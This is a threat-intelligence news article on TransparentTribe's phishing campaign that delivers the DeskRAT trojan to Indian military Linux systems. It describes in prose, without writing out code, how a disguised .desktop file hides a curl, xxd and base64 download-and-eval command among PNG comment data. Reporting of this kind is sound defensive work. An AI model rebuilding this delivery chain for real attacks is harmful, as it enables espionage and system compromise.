TransparentTribe Attack Linux-Based Systems of Indian Military Organizations to Deliver DeskRAT

TransparentTribe, a Pakistani-nexus intrusion set active since at least 2013, has intensified its cyber espionage operations targeting Linux-based systems of Indian military and defense organizations.

The campaign, initially documented in July 2025 by CYFIRMA with activity traced back to June 2025, has evolved significantly with the development of a sophisticated Golang-based remote access trojan dubbed DeskRAT.

This malware represents a notable escalation in the group’s technical capabilities, demonstrating their commitment to maintaining strategic cyber dominance against Indian defense interests.

The attack campaign employs a deceptively simple yet effective multi-stage delivery mechanism that begins with phishing emails containing malicious ZIP archives.

These archives are disguised with innocuous-sounding names such as “MoM_regarding_Defence_Sectors_by_Secy_Defence” to evade initial detection.

Upon extraction, the archives reveal a DESKTOP file that masquerades as a legitimate PDF document, complete with a PDF icon to reinforce the deception.

When executed by unsuspecting users, the file triggers a complex infection chain that ultimately establishes persistent remote access to compromised systems.

Sekoia analysts identified and analyzed the evolution of this campaign through their threat detection systems, discovering new samples in August and September 2025 that revealed an updated infection chain.

The researchers implemented multiple YARA rules to track the activity and found samples that were previously unknown to other security vendors, indicating the group’s efforts to stay ahead of conventional detection mechanisms.

This discovery underscores the sophistication and evolving nature of TransparentTribe’s operations.

The technical infrastructure supporting this campaign has also undergone refinement. Initial phishing emails directed targets to ZIP files hosted on legitimate cloud services such as Google Drive, but the operation has since shifted to dedicated staging servers.

This evolution demonstrates operational security awareness and an attempt to avoid reliance on third-party platforms that could be more easily monitored or suspended by security teams.

Deceptive Infection Mechanism Through Embedded Obfuscation

The DESKTOP file employed in this campaign contains a particularly ingenious obfuscation technique that hides malicious Bash commands within thousands of lines of commented PNG image data.

The actual [Desktop Entry] section containing the malware execution instructions is strategically placed between two massive blocks of PNG data, effectively concealing the payload from casual inspection.

This layering technique exploits the fact that a typical user reviewing the file would encounter overwhelming amounts of image data before discovering the embedded commands.

The Bash one-liner executed upon file activation orchestrates a sophisticated multi-stage payload delivery.

The command first generates a unique filename in the /tmp/ directory using a timestamp, then downloads an encoded binary from the remote staging server using curl with specific error-handling flags.

The downloaded content undergoes dual decoding: initial hexadecimal conversion using xxd, followed by Base64 decryption.

Once decoded, the payload executes directly through eval, gaining immediate control of the system.

Simultaneously, the infection chain launches Firefox to display a decoy PDF document hosted on the attacker’s server, creating the illusion of a legitimate document opening while the RAT silently establishes its presence.

This coordinated execution provides social engineering cover for the malware installation.

DeskRAT itself maintains command and control communications through WebSocket connections, enabling real-time interaction between the attackers and compromised systems.

The malware’s Golang implementation provides cross-platform compatibility and enhanced persistence capabilities, making it particularly effective against the diverse Linux environments deployed throughout Indian military infrastructure.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.